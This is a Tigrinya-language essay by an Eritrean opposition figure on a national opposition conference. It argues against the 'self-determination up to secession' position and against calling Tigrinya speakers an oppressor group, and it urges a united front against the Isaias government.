ሃገራዊ ዋዕላ ክበሃል ከሎ ገለ መለለዪ ጠባያት ኣለዉዎ፡፡ እቲ መሰረታዊ ዝዀነ መለለዪኡ ሉዓላውነት ኢዩ፡፡ ሃገራዊ ዋዕላ ሉዓላዊ ክኸውን ኣለዎ ክበሃል ከሎ እንታይ ማለት ኢዩ? እዚ ማለት እቲ ዝጋባእ ዘሎ ህዝቢ ካብ ዝዀነ ኣካል ነፃ ክኸውን ኣለዎ ማለት ኢዩ፡፡ እቲ ዋዕላ ክውደብ ከሎ፣ ክካየዶ ከሎ ብዝዀነ መልክዕ ብልዕሊኡ ኰይኑ ዝእዝዞ ወይ ተጽዕኖ ዝገብረሉ ሓይሊ ክህሉ የብሉን ማለት ኢዩ፡፡ ኣብ መስርሕ ዋዕላ ጉዳይ ምወላ ወይ ገንዘብ ኣዚዩ ኣገዳሲ ኢዩ፡፡ ንገንዘብ ብዝርኢ አውን ሉዓላውነት ዋዕላ ሕሉው ክኸውን ኣለዎ፡፡ ሕራይ ሓገዛት የድልዮ ኢዩ፤ እቲ ገንዘባዊ ሓገዛት ግን ካብ መንግስታት ይኹን ካብ ዘይመንግስታዊ ውድባትን ምንቅስቓሳትን ስርዒታትን ወይ አውን ካብ ውልቀሰባት፡ ብናይ ሶሊዳሪቲ (ብናይ ምሕዝነት) መንፈስ ኢዩ ክወሃብ ዘለዎ፡፡ ኣካየድቲ ዋዕላ ነቲ ዝተለገሰ ገንዘብ ንሉዓላውነት ብዘይሃሲ ኣገባብ፡ ኣብ ምውዳብን ምስልሳልን ዋዕላ የውዕልዎ፡፡

 

ነዚ ዝተጠቕሰን ንኻልእ ነጥብታትን ብዝርኢ ስኽፍታታት ስለዘሎኒ አብዚ ዝተባህለ ዋዕላ ኣይሳተፍን ዘለኹ፡፡ እንተዀነ ግን በዚ እዋንዚ ዝዝርዝሮ ነገር የብለይን፤ እቲ ተጀሚሩ ዘሎ መስርሕ ይቐጽል፤ ክሳብ መወዳእታኡ ይቐጽል፡፡ ምስተወድአ ናተይ ገምጋም ክህብ ኢየ፤ ዝድገፍ እንተረኸብኩሉ ነቲ ዝድገፍ እድግፎ፤ ነቲ ዘይድገፍ ሸነኹ ኸኣ ከቃልዖ ሙዃነይ ካብ ሕጂ እሕብር እነሆ፡፡

 

ሕጂ ክዛረብ ዘይደልየሉ ምኽንያት እቲ ዝካየድ ዘሎ መስርሕ ብባህርያዊ ዓቕሙ ኣብቲ ክበጽሖ ዝኽእል ንኽበጽሕ ዕድል መታን ክህልዎ ኢለ እየ፡፡ ምናልባት ገለ ፀገማት እንተመፀ፡ ገለ ኣካላት እኮ ዓንቃፊ ኣስተዋጽኦ ገይሮም ነይሮም ኢዮም ከይበሃል መታን ጥንቃቐ የድሊ፡፡ ሓደ ነገር ግን ከረጋግፀልኩም፤ እዚ ሕጂ ዘሎኒ ስኽፍታ ብዘየገድስ፡ እቲ ዝኸይድ ዘሎ መስርሕ ንኽዕወት ልባዊ ትምኒተይ ኢዩ፡፡

 

እዚ ዝካየድ ዘሎ ዋዕላ ብገለ ሽግራት ዝተኸበበ ሙዃኑ አስተብህል ኣለኹ። መብዛሕትኡ ካብቲ ሽግራት ከኣ ምስቲ ታሪኽን ክዉንነትን ናይ’ቲ ጭውያ ኢለ ዝጠቐስኩዎ ዘሕዝን ፍጻሜ ዝተተሓሓዘ ኢዩ።

 

ንሕና - ማለት፡ እዞም ሓይልታት ተቓውሞ - ንዲሞክራሲ፡ ብኡ አቢልና ኸኣ ብመሰረቱ ንድሕነት ሃገረ-ኤርትራ ኢና ንቃለስ ዘሎና። ካብ 1991 ኣትሒዝና ዲሞክራስያዊ ስርዓት ንምትካል ብዝብል ዕላማ ንንቀሳቐስ ኣሎና።

 

ኣብ ብዙሓት ሃገራት ኣፍሪቃን እስያን ቃልሲ ስለ ዲሞክራሲ ይካየድ ኣሎ። ኣብ ዝዀነ ሃገር ወይ ሕብረተ-ሰብ ዲሞክራሲ መታን ክቐውምን ክጥጥዕን ክማልኡ ዘለዎም ሮቛሒታት ኣለዉ። ሓደ ካብዞም ሮቛሒታት ከኣ እቲ ከም ውሁብ ዝውሰድ እሞ ብዙሕ እዋን ዘይጥቀስ “ህላዌ ሃገር” ኢዩ። ዲሞክራስያዊ ሰርዓት ንኽትተክል ቅድመ-ዝኣገረ ሃገር ክህሉ ኣለዎ። እምበኣር ኣብ ኤርትራ ዲሞክራስያዊ ስርዓት ክንተክል እንተድኣ ኰንና ቅድም ቀዳድም ህላዌ ናይ’ዛ ኤርትራ ትበሃል ሃገር ከነረጋግጽ ኣሎና ማለት’ዩ። ነዚ ንምርግጋጽ ከኣ ንቐጻልነት ኤርትራ ከም ሓንቲ ሃገር ንዝፈታተን ወይ ሓደገኛ ዝዀነ ፖለቲካ ክንጥንቀቐሉ ኣሎና ጥራይ ዘይኰነ፡ ክንቃለሶ እውን ኣሎና ማለት’ዩ።

 

ምስ’ዚ ብዝተተሓሓዘ እምበኣር እዚ ኣብ መስርሕ’ዚ ዋዕላ ዘከራኽር ዘሎ መሰል ብሄራት ክሳብ ምግንጻል ዝብል ጉዳይ ክጥቀስ ናይ ግድን ኢዩ።

 

ብጊዜ ብረታዊ ነጻነታዊ ገድሊ መሰል ብሄረ-ሰባት ኤርትራ፡ ከም ዛዕባ መጠን፡ ሽሕኳ ኣዚዩ ድሙቕ ቆላሕታ እንተዘይተገብረሉ፡ ኣይተጐስየን ዝነበረ፤ ካብ መንጽር ዲሞክራስን ኣብ ክሊ ሓድነት ኤርትራን ኣገዳስነት ተዋሂቡዎ ነይሩ ኢዩ። መሰል ብሄራት ክሳብ ምግንጻል ዝብል ፖለቲካ ግን ጀብሃ ዓባይ ብድምር ሓይሊ ግንባርን ወያኔን ካብ ሜዳ ድሕሪ ምውጻኣ ኢዩ ዝመጸ። ብኻልእ ኣዘራርባ፡ እዚ ክሳብ ምግንጻል ዝብል ቋንቋ ሰውራ ኤርትራ ድሕሪ ምጭዋዩ ኢዩ ዝተቐልቀለ። እኳ ደኣ፡ ነቲ ዝተቐልቀለሉ እዋንን ነቲ ሰሪቡዎ ዘሎ ሓደጋን ኣብ ግምት ከተእቱ ከሎኻ እዚ መሰል ብሄራት ክሳብ ምግንጻል ዝብል መርገጽ ወይ ወፈራ ሳዕቤንን መርኣያን ናይ’ቲ ጭውያ ኰይኑ ኢዩ ዝርኣየካ።

 

መሰል ብሄረ-ሰባት ክበሃል ከሎ እንታይ ማለት ሙዃኑ ቅድሚ ሎሚ ተዛሪበናሉ ኢና። ኣብ ኩነታት ኤርትራ ብኸመይ ከምዝትርጐምን ከምዝትግበርን ዝገልጽ ትንተና ኸኣ ኣብቲ እታ ሽማግለና ዘዳለወቶ መጽናዕቲ ሃገራዊ ዋዕላ ከም ጥብቆ ኰይኑ ሰፊሩ አሎ። ኣብቲ መጽናዕቲ ዝገለጸናዮ መሰረታዊ ነጥቢ እዚ ዝስዕብ ነይሩ፤

 

“ንሕና ብማዕርነት ናይ ኩለን ብሄረ-ሰባትና ንኣምን። ምስቲ ሃገራዊ መደባትን ፖሊሲን ብዝሳነ ኣገባብ፡ ኩለን ብሄረ-ሰባትና አብ ናይ ገዛእ ርእሰን ምምሕዳር ዓቢ ግደ ይህልወን፤ ንቋንቋታተን ንዝደለያኦ ዕላማን መደብን ክጥቀማሉ፡ ብባህላዊ ትሕዝቶአን ክሕበና፡ ንኹሉ ሸነኻት ባህለን ብዝኾነ ኣገባብ ከንጸባርቕኦ መሰለን ኢዩ። ብተግባር ከአ ይሕለወለን።

 

“ማዕርነት ናይ ብሄረ-ሰባትና ምሕላውን ብተግባር ምርግጋጽን፡ መሰረታዊ ዲሞክራስያዊ መትከል ጥራይ ኣይኰነን። እንታይ ደኣ፡ ንቐጻሊ ሓድነት ሃገርና እውን ኣዚዩ ኣገዳሲ ዝዀነ ሜላ ኢዩ። …….. ሕቶ ብሄረ-ሰባትና ብዓቢ ጥንቃቐን ብፍትሓውነትን ክተሓዝ ኣለዎ። እኳ ደኣ፡ ንማዕርነትን ምዕባለን ብሄረ-ሰባትና ብተግባር ምሕላቕን ምትብባዕን፡ ሓደ ካብቲ መሰረታዊ ዕላማታት ናይ ሓቀኛ ሃገራዊ መንግስቲ ኤርትራ ክኸውን ይግባእ።”

 

እዚ እቲ መሰረታዊ ነጥቢ ወይ መልእኽቲ ኢዩ። ንሰፊሕ ትንተና ግን ነቲ ኣብቲ መጽናዕቲ ዘሎ ጥብቆ ብጥንቃቐ ከተንብብዎ እላበወኩም።

 

ከምቲ ኣቐዲመ ዝጠቐስኩዎ ኣብ ዝሓለፈ መድረኻት መሰል ብሄራት ኣብ ክሊ ሓድነት ኤርትራ ኢዩ ዝጥቀስን ዝድገፍን ዝነበረ። እዚ ድሕሪ ጭውያ ሰውራና ዝመጸ ክሳብ ምግንጻል ዝብል ዘረባ ኣዚዩ ሓደገኛ ክኸውን ይኽእል ኢዩ። ብሽም ርእሰ-ውሳኔ ብሄራት፡ ኤርትራ ፋሕ-ብትን ኢላ ክትጠፍእ ትኽእል ኢያ!!

 

ነዚ ኣርእስቲ እዚ ምስዚ ዋዕላ ተባሂሉ ዝካየድ ዘሎ ጉዳይ ኣተሓሒዝና ክንዛረበሉ ናይ ግድን ኢዩ። ብዙሓት ካባኻትኩም ከም እትዝክርዎ ዓሚ፡ ቁሩብ ሰሙናት ቅድሚ እቲ ዋዕላ ምክያዱ፡ ናይዘን ብሄራዊ ውድባትና ጥራይ ዝዀነ ዋዕላ ኣብ መቐለ ተኻዪዱ ነይሩ። እቲ ዋዕላ ንሕቶ ብሄራት አትኩሮት ሂቡ ድሕሪ ምምያጥ ኣብ ዘሕለፎ ውሳኔታት ”መሰል ርእሰ-ውሳኔ ብሄራት ክሳብ ምግንፃል” ንዝብል መርገጽ ኣስመረሉ፡፡ ብኣቀዋውማአን ሕብረ ብሄራዊ ዝዀና ገለ ውድባት አውን ነዚ መርገጽ እዚ ዝድግፋ ሙዃነን ገሊፀን እየን፡፡ ኣረኣእያአን ፍልይ ዝበለ እዩ ንኽበሃለለን ግዲ ዀይነን ግን ኣብ ክንዲ ብጥሪኡ ክሳብ ምግንፃል ዝብላ ነቲ ርእሰ-ውሳኔ ብረፈረንደምዶ ብዘይገደብ ብዝብላ ቃላት ከልዝባኦ ፈቲነን እየን፡፡ እዚ ፈተነዚ ግን ዝገብሮ ፍልልይ የብሉን፤ ብረፈረንደም በሎ፡ ብዘይገደብ በሎ እቲ ዝድገፍ ዘሎ ሓሳብ ንሱ እቲ ናይ ምግንፃል ሓሳብ ኢዩ፡፡

 

ኣብታ አብ ፍራንክፈርት ብ 3 መሰከረም ዘተኻየደ በዓል ዘስማዕኩዋ ሓፃር ርእይቶ ነዚ ኣብ ምንቅስቓስ ተቓወምቲ ሓይልታት ኤርትራ ዝተአታቶ ዘሎ “ክሳብ ምግንፃል” ዝብል ነገር “ባዕዳዊ ኣጀንዳ” ኢለ ገሊፀዮ ነይረ፡፡ ሕጂ እውን እደግሞ ኣነኹ፤ ክሳብ ምፍላይ ዝብል ወፈራ ባዕዳዊ ተልእኾ እዩ፡፡ እዚ መሰል ብሄራት ክሳብ ምግንፃል ዝብል መርገጽ ኣብቲ ሕገመንግስቲ ኢትዮጵያ ከይተረፈ ከምዝሰፍር ዝተገብረ ማእከላዊ መርሓ-ግብሪ ውድብ ህዝባዊ ወያኔ ኢዩ፡፡ መብዛሕትአን ካብ እዘን መሰል ብሄራት ክሳብ ምግንፃል ዝብላ ውድባትና ከኣ ሰውራና ካብ ዝተጨወየሉ ጊዜ ኣትሒዘን ምስ ውድብ ህዝባዊ ወያኔ ስጡም ርክብ ዝነበረንን ዘለወንን እየን፡፡ ምስዚ ብዝተአሳሰረ ኣብቲ ኣብ መቐለ ዝተኻየደ ዋዕላ ብሄራዊ ውድባት ዶክተር ካሕሳይ ገብረየሱስ ዝተባህለ ገዲም ተጋዳላይ ወያኔ ”ሕቶ ብሄር ማእከሉ ዝገበረ ሰፊሕ መጽናዕታውን ትምህርታውን መግለፂ” ከምዝሃበ፡ እቲ መግለፂኡ ኸኣ “ተመክሮ ህወሓት” አውን ዘጠቓለለ ከምዝነበረ ምጥቃሱ ኣገዳስነት ኣለዎ፡፡ እዚኢታት ኩሉ ኣብ ግምት ክኣቱ ኸሎ እዚ ክሳብ ምፍላይ ዝብል መርገጽ ምስ ፖሊሲ ህዝባዊ ወያኔ ዝተኣሳሰረ - እኳ ደኣ ፖሊሲ ህዝባዊ ወያኔ ዝወለዶ - ኰይኑ ኢዩ ዝርኣየካ፡፡

 

ንምዃኑ ክሳብ ምግንፃል ወይ ክሳብ ምፍላይ ዝብል ፖሊሲ ንምንታይ የድሊ? እቲ ውሽጣዊ መሰላት ምሕላው ንምንታይ ዘይኣክል? ኢለ ንገሊኦም ኣብ ዝሓተሉ ጊዜ ዝረኽቦ መልሲ ነዚ ዝስዕብ ዝመስል ኢዩ፡፡ አዚ ክሳብ ምግንፃል ዝብል ሕንፃጽ ዋሕስነት ኢዩ፡፡ ሓንቲ ብሄር እንተድኣ ተጨቍና አትትግብሮ መሰል ኢዩ፤ እንተድኣ መሰለን ተሓሊዩለን እተን ብሄራት ዝግንፀላሉ ምኽንያት የብለንን፡፡

 

እዚ ዘዕግብ ወይ ኣእማኒ ሞጐተ ኣይኰነን፡፡ እቲ ኣብ ስልጣን ዘሎ ስርዓት - ከምዚ ሕጂ ኣብ ኣስመራ ዘሎ - ጨቋኒ እንተድኣ ኰይኑ፡ መሰል ርእሰ ውሳኔ ክሳብ ምግንፃል ዝብል ሕገ-መንግስታዊ ዓንቀጽ ይኹን ዝዀነ ካልእ ኣምር ኣይዓጅቦን ኢዩ፡፡ እታ ዝተጨቈነት ብሄር ናይ ምፍላይ መሰል ኣለና እሞ ክንፍለ እንተበለት እቲ ጨቋኒ ስርዓት አይፈቅድን ኢዩ፡፡ እንተፈቒዱ እሞ ጨቋኒ አውን ኣይኰነን ማለት እኮ እዩ!! እምበኣር ኣብዚ ኩነታትዚ እታ ዝተጨቈነት ብሄር እንተተፈልያ፡ ናይ ምፍላይ መሰል ዘስፈረ ሕገ-መንግስታዊ ዓንቀጽ ስለዘሎ ከይኰነስ ብሓይሊ ጥራይ ኢዩ፡፡ (እቲ ሓይሊ ናይ መን ወይ ካበየናይ ሃገር ዝመፀ ኢዩ ዝብል ሕቶ ርእሱ ዝኸአለ ጉዳይ ኢዩ፡፡) ብተወሳኺ፡ እቲ ምፍላይ ዝረጋገጽ ብሓይሊ ጥራይ እንተድአ ኰይኑ - ከምኡ ኸአ ኢዩ - ሓንቲ ብሄር ከይተጨቈነት ከላ እውን ገሊኦም ጉጅለታታ ንገለ ዕላማ “ጭቆና”ዶ “ርእሰ-ውሳኔ” ብዝብል ምስምስ ከምትፍለ ክገብሩዋ ይኽእሉ ኢዮም!!

 

እዚ ክሳብ ምግንፃል ዝብል ነጥቢ ምስ ሕቶ ብሄራዊ ጭቆና ዝተተሓሓዘ ብሙዃኑ ንዝምድና ብሄረሰባትና ብዝርኢ ሰራም ሳዕቤናት ክህልዎ ዝኽእል ኢዩ፡፡ ብዙሓት ካብዘን ክሳብ ምግንፃል ዝብል ፖለቲካ ዘለወን ውድባት ኣብ ኤርትራ ብሄራዊ ጭቆና በዚ እዋንዚ ሓደ ካብቲ መሰረታዊ ፀገማት ከምዝዀነ ገይረን የቕርበኦ፡፡ ገሊኦም ምንቅስቓሳት እሞ ኸኣ - ንኣብነት እቶም ተበግሶ ምስረታ ብሄረ ትግርኛ ኤርትራ ዝብሃሉ ጉጅለ - ሕሉፍ ሓሊፎም፡ ኣብዚ እዋንዚ ሕቶ ብሄራትን ብሄረ-ሰባትን እቲ “እንኮን ተባራዕን እዋናውን መድረኻውን ሕቶ“ ኢሎም፡ ኣብዚ መድረኽዚ እቲ “ቅኑዕን ርትዓውን ኣገባብ ቃልሲ“ ብብሄርን ብሄረሰብን መሰረት ተወዲብካ ጥራይ ሙዃኑ ይገልፁ፡፡ እዚ ሓደገኛ ኣቀራርባ ኢዩ፡፡ ብሄራዊ ጭቆና ኣሎ ጥራይ ዘይኰነስ እቲ መሰረታዊ ወይ “እንኮን ተባራዕን“ ሕቶ እቲ ናይ ብሄራት ኢዩ እንተድኣ ኢልካ፡ ባህርያት ናይቲ ኣብ ኤርትራ ዘሎ ጭቆና ብመሰረቱ ብሄራዊ ወይ ብሄረሰባዊ ኢዩ ኢኻ ትብል ዘለኻ፡፡ እዚ ማለት ከአ እምበኣር ጨቋኒ ብሄርን ጭቁናት ብሄራትን ኣለዋ ማለት ኢዩ፡፡ እዚ ኣብ ኩነታትና ኣዚዩ ሓደገኛ ዝዀነ ኣዘራርባ ኢዩ፡፡

 

መን ኢዩ ጨቋኒ ብሄር ኣብ ኤርትራ? ኩሉ ሓቀኛ ተዓዛቢ ከምዝምስክሮ ኣብ ኤርትራ ንኹላትና ብዘይ ኣፈላላይ ዝጭቁን ውልቀ ምልካዊ ስርዓት ኢዩ ነጊሱ ዘሎ፡፡ ቅድሚ ገለ ዓመታት ኣብ ዝሃብኩዎ ሓደ መደረ “እዚ መንግስትዚ መንግስቲ ከበሳ ኣይኰነ፣ መንግስቲ መታሕት አይኰነ፣ መንግሰቲ ሰምሃር ወይ ባርካ አይኰነ፣ መንግስቲ ሓማሴን ኣይኰነ፣ መንግስቲ ኣከለጉዛይ ወይ መንግስቲ ሰራየ ኣይኰነ፤ እዚ መንግስቲ እዚ መንግስቲ ኢሳያስ ኢዩ“ ዝትሕዝቶኡ መልእኽቲ ኣመሓላሊፈ ነይረ፡፡ እምበኣር እታ ሓቂ ንሳ ኢያ፡፡ መንግስቲ ኢሳያስ ንኹላትና ኢዩ ጨቍኑ ዘሎ፡፡ ኩሉ ማይ ቤት፡ ኩሉ ኣውራጃ፡ ኩሉ ብሄረሰብ ተጨቍኑ ኣሎ፡፡

 

እምበኣርከስ ኩሉ ህዝቢ ኤርትራ፡ ወገንን ሃይማኖትን ብዘየገድስ፡ ተጨቍኑ ክነሱ እዚ ጨቋኒ ኢዩ፡ እዚ ጭቁን ኢዩ ዝብል ኣዘራርባ ጠገለ ዝሳአነ፡ ከይሲ መደብ ንምዕዋት ዝድሀ ዘሎ ፈጠራ ኢዩ፡፡ ምስዚ ብዝተተሓሓዘ ንኣብነት እዛ ትግርኛ ትዛረብ ብሄረሰብ ጨቋኒት ኢያ፤ ነተን ካልኦት ትጭቁነን ኣላ፡ ዝብል ዘስደምም ዘረባ ሓሓሊፉ ይስማዕ ኢዩ፡፡

 

ከመይ ኢሉ ኢዩ እዚ ትግርኛ ዝቛንቁኡ ብሄር ጨቋኒ ዝኸውን? ኣብ ውሽጢ ኤርትራ ዝነብር ትግርኛ ዝቛንቁኡ ልክዕ ከም ኩሎም ካልኦት ደቂ ሃገር ብኹሉ ሜዳያት መሰሉ ተገፊፉዎ ዘሎ እንዲዩ! ከም ኩሎም ኤርትራውያን ዝቕተል ዘሎ፡ ዝእሰር ዘሎ፡ዝጠሚ ዘሎ፡ኣብ ምድረበዳ ዝነቅጽ ዘሎ፡ ኣብ ባሕርታት ዝጥሕል ዘሎ እንዲዩ?

 

ልክዕ ኢዩ፡ ኢሳያስ ትግርኛ ዝዛረብ ሰብ ኢዩ፤ ካብቶም ተሓባበርቱ እውን ብዙሓት ትግርኛ ተዛረብቲ ኢዮም፤ (ሙዃንኳ ካልእ ቋንቋታት ኤርትራ ዝዛረቡ ልኡኻትን ኣገልገልትን እውን ኣለዉዎ!) ብዙሓት ካብቶም ኣብ ዲያስፖራ ዘለዉ ዘጣቕዑሉ - ገሊኦም የዋሃት፡ ገሊኦም ጐራሓት - እውን ትግርኛ ዝዛረቡ ኢዮም፡፡ እዚ ግን እቲ ትግርኛ ዝዛረብ ኤርትራዊ ከም ብሄር ንኻልኦት ይጭቁን አሎ ኣየብልን ኢዩ፡፡ ተጨቍንካ ከለኻኸ ከመይ ኢልካ ኢኻ ጨቋኒ ክትከውን ዝከኣል!!

 

በዚ እዋንዚ ንትግርኛ ዝቛንቁኡ ካብተን ካልኦት ብሄራት ኤርትራ ክንጽል ዝህቅን መርገፃት ጥራይ ኣይኰነን ዘድሀ ዘሎ፤ ንትግርኛ ዝዛረብ ከበሳዊ ኤርትራዊ ምስ ኣብ ኢትዮጵያ ዘሎ ትግርኛ ዝቛንቁኡ ህዝቢ ከዛምድ ዝሕልን ገለ ፃዕርታት እውን ንዕዘብ አሎና፡፡ ንኣብነት ኣቐድም ኣቢለ ተበግሶ ምስረታ ብሄረ ትግርኛ ኤርትራ ንዝብል ምንቅስቓስ ጠቒሰ ነይረ፡፡ ሽም ናይቲ ምንቅስቓስ ጥራይ ንገዛእ ርእሱ ዝሕብሮ ነገር ኣለዎ፡፡ ንሱ ኸአ ብሄረ ትግርኛ ካብ ኤርትራ ወፃኢ እውን ከምዘሎ እዩ፡፡ ነዚ ኣተራጉማ አዚ ብጭቡጥ ዝድግፍ ሙቛም ናይ ሓደ “ማሕበር ሰላምን ሕውነትን ስድራ ቤታት ትግርኛን ተዳወብቲ ብሄራትን” ዝብሃል ኣካል ኢዩ፡፡ እቲ ዓንደ ሕጉ  ከምዝሕብሮ ጊዜያዊ ቤት ጽሕፈት እዚ ማሕበርዚ ኣብ ኣዲሰ ኣበባን ሽረን መቐለን ኢዩ፡፡ ደቂ ማሕበር ክዀኑ ዝኽእሉ ኸኣ “ኩሎም እቶም ብብሄር ትግርኛ ዝፍለጡ ኤርትራውያን ይኹኑ ኢትዮጵያውያን ኢዮም፡፡“ እዞም ኣብ ክልቲኡ ሃገራት ዘለዉ ዜጋታት ብሄረ ትግርኛ ሓደ ኣካል ሙዃኖም እቲ ዓንዲ ሕጊ ይእምት፡፡ ቀንዲ ዕላማ እዚ ማሕበርዚ “ስድራቤታት ብሄረ ትግርኛ ኤርትራን ኢትዮጵያን ኣብ ንቡር ሕቕፎኡ ብዝፀንዐ ክነብር” ምጽዓር ኢዩ፡፡

 

ነቲ ትግርኛ ዝቛንቁኡ ህዝቢ ከበሳ ካብ ካልኦት ብሄራት ኤርትራ ብተግባር ክንጽሎ ዝህቅን መደብ ወይ ውጥን በቲ ሓደ ወገን፣ ምስ ህዝቢ ትግራይ ሓደ ኣካል ኢዩ ዝብል ወፈራ ከኣ በቲ ካልእ ወገን ክካየድ ንርኢ ኣሎና፡፡ እዚ ክልተ ኣቀራርባታትዚ ኣይገራጮን ኢዩ፡፡ እኳ ደኣ ተሓጋጋዚ ወይ ተመጋጋቢ ኢዩ፡፡ እዚ ክልቲኡ መርገፃትዚ ተደጋጊፉ ከበሳና ካብ ካልኦት ብሄራት ኤርትራ ተነፂሉ ምስ ትግራይ ክተአሳሰር ዝደፋፍእ ኢዩ፡፡ ንገለ ኣነ ዘዛረብኩዎም ተዓዘብቲ እዚ ፃዕርታትዚ ነቲ ተዓቍሩ ኣሎ ዝበሃል ውጥን ትግራይ ትግርኚ መንፀፍ ኰይኑ ተራእዩዎም ኣሎ፡፡

 

ናብዛ ብሄረ ትግርኛ ጨቋኒ ኢዩ ትብል ዘረባ ክመልሰኩም! እዛ ዘረባዚኣ ሓሶት ኣብ ርእሲ ሙዃና ከይዳ ኸይዳ ንመንግስቲ ኢሳያስ ተገልግል ኢያ፡፡ ከመይ? ትግርኛ ዝቛንቁኡ ብሄር ጨቋኒ ኢዩ እንተኢልካ አብቲ ህዝብቲ ሙሉእ ምትእምማን ክህልወካ ኣይክእልን ኢዩ ማለት ኢዩ፡፡ ስለዚ ኸኣ ንመንግስቲ ኢሳያስ ንምውዳቕ ምስ ከበሳውያን ልባዊ ምትሕብባር ክትገብር ኣይትኽእልን ኢኻ፡፡ እዚ ማለት ከኣ ንኹሉ ብሄረሰባትን ፖለቲካዊ ምንቅስቓሳትን ዝጠርነፈ ሰፊሕ ሃገራዊ ግንባር ወይ ምሕዝነት ኣንፃር እዚ ውልቀመላኺ ስርዓት ንኽትውድብን ከተካይድን ፀገም ክዀነካ ኢዩ ማለት ኢዩ፡፡ ጨቋንን ጭቁንን አብ ሓደ ግንባር ወይ ምሕዝነት ኰይኖም በድማዕነት ክትሓባበሩ ቀሊል ኣይኰነን!! እዚ እቲ ኣንፃር ኢሳያስ ዝካየድ ቃልሲ ኣይድንፍዕን፡ ስለዚ ኸአ ዕድመ ውልቀ መላኺ ኢሳያስ ይናዋሕ ማለት ኢዩ፡፡

 

ትግርኛ ዝቛንቁኡ ብሄር ጨቋኒ ኢዩ ምባል ለባም ፖለቲካ ኣይኰነን፤ ወረ ዓሻ ፖለቲካ ኢዩ!! ስለምንታይ ከምዚ እብል ኣለኹ? ለባም ወይ ኣድማዒ ፖለቲከኛ ዘርብሖ ሜላታት እንታይ ሙዃኑ ፈሊጡ ዝትግብር ኢዩ፡፡ ሓቀኛ ናይ ተቓውሞ መርገጽ ዘለዎ ኤርትራዊ ውድባት በዚ ሎሚ እንታይ ኢዩ ዘርብሖ እንተተባህለ ብዝተኻእለ መጠን ሰፊሕ ሸነኽ ህዝቢ ኤርትራ ኣብ ጐኑ ተሰሊፉ ኣንፃር መንግስቲ ኢሳያስ ወይ መንግስቲ ህግዲፍ ክቃለስ ኢዩ፡፡ ኣብዚ ኢዩ ዘሎ ረብሓ ተቓወምቲ ውድባት!! ካብዚ መንጽርዚ ክርአ ኸሎ እዚ ብሄረ ትግርኛ ጨቋኒ ኢዩ ዝብል ኣረኣእያ ንረብሓ ተቓወምቲ ዘገልግል ኣይኰነን፡፡ ነቲ ትግርኛ ተዛራባይ ንስኻ ጨቋኒ ኢኻ ክትብሎ ከሎኻ እሞ ከም ጨቋኒ ጌርካ ክትርእዮ ከሎኻ ናብ ህግዲፍ፡ ናብ ኢሳያስ፡.ገፁ ንክኸይድ ኢኻ ትደፋፍኦ ዘለኻ፡፡ ተቓዋሚ ውድብ ወይ ተቓዋሚ ኣካል ኰንካ ብሄረ ትግርኛ ጨቋኒ ኢዩ ክትብል ከሎኻ እምበኣር ኣንፃር ጥቕምኻ ኢኻ ትዋፈር ዘሎኻ ማለት ኢዩ፡፡

 

እቲ ለባም ወይ ኣድማዒ ፖለቲካ ኣንፃር ናይዚ ኢዩ ክኸውን ዘለዎ፡፡ ብዝተኻእለ መጠን ኩሉ ኤርትራዊ ኣብ ጐንኻ ክኸውን ስለዝድለ ንትግርኛ ዝቛንቁኡ ይኹን ንኻልእ “ንዓታ ተጨቍንካ ኢኻ ዘለኻ እሞ ኣንፃር ውልቀምልካዊ ስርዓት ህግዲፍ ተቓለስ” ምባሉ ኢዩ፡፡ ኣብ ገሊኡ ኩነታት እሞ ኸኣ ዋላ ኣጋኒንካ፡ ቁሩብ ጥራይ ዒሚም ንዝብል ዘሎ አውን “ንዓታ ንስኻ እውን ጭቁን ኢኻ“ እናበልካ ኣብ ጐንኻ ኣምፂእካ ነቲ መንግስቲ ካብ ህዝቢ ምንፃሉ ኢዩ እቲ ለባም ፖለቲካ!1

 

ስለዚ እዛ ብሄረ ትግርኛ ጨቋኒ ኢዩ ትብል ኣዘራርባ ከይዳ ኸይዳ ንኢሳያስን ንናይ ርሑቕ መደብ ተሓባበርቱን ተርብሕ ኣበሃህላ ኢያ፡፡ ለባም ዝዀነ ሓቀኛ ሓይሊ ተቓውሞ ኣይብላን ኢዩ፡፡ ምናልባት እምበኣር ገለ ካብቶም ብሄረ ትግርኛ ጨቋኒ ኢዩ ዝብሉ ዘለዉ ኣካላት ጐራሕ ብዝዀነ መንገዲ ተልእኾ ኢሳያስ ዝፍጽሙ ዘለዉ ክኸኑ ይኽእሉ ኢዮም፤ ከምኡ እውን ብተወሳኺ እዛ ብሄረ ትግርኛ ጨቋኒ ኢዩ ትብል ሓሶት ነታ መሰል ብሄራት ክሳብ ምፍንጫል ትብል ሓደገኛ ኣምር ንምምኽናይ ትፍኖ ዘላ መናፍሕ ክትከውን ትኽእል እያ!! በቲ ኻልእ ወገን ከአ ገለ ንፁሃት ሃገራውያን ተቓወምቲ፡ ገርሀኛታት ብሙዃኖም፡ ናይዚ ኣዘራርባዚ ተንኰል ከይተረድኡ ነቲ ትግርኛ ዝቛንቁኡ ህዝቢ ካብቲ ስርዓት ይጥቀም ከምዘሎ ገይሮም ይርእይዎ፡ ስለዚ ኸአ ኣካል ናይቲ ጨቋኒ ስርዓት ከምዝዀነ ገይሮም የቕርብዎ፡፡ ከምዚኦም ዝበሉ ንፁሃት ሓርበኛታት ከይተፈለጦም ኣንፃር ጥቕሞም ይዋፈሩ ኣለዉ፡፡ ስለዚ እዞም ሓርበኛታት እዚኦም ንኢሳያስን ንትግርኛ ዝቛንቁኡ ህዝብናን ፈላሊዮም ንኽርእይዎም መታን፡ ምስኣታቶም ልባዊ ምርድዳእ ክግበር ኣለዎ፡፡

 

እምበኣር ነዛ ነጥቢ እዚኣ ክንዛዝማ፤ ኩላትና - ማለት ኩሉ ብሄራትን ማሕበራዊ ጉጅለታትን - ኢና ተጨቍንና ዘሎና እሞ ንኹሉ ዝሓቁፍ፡ ንኹሉ ዘሳትፍ ሰፊሕ ሓርበኛዊ ምንቅስቓስ ንኽድንፍዕ ጻዕርታትና ከነዛይድ ይግባእ፡፡ ነዚ ፃዕርታትዚ ዕንቅፋታት ንዝኸውን ፈጠራታት ንምፍሻል ከአ ኩሉ ሓቀኛ ተቓዋሚ ኤርትራዊ ክዋፈር ኣለዎ፡፡

 

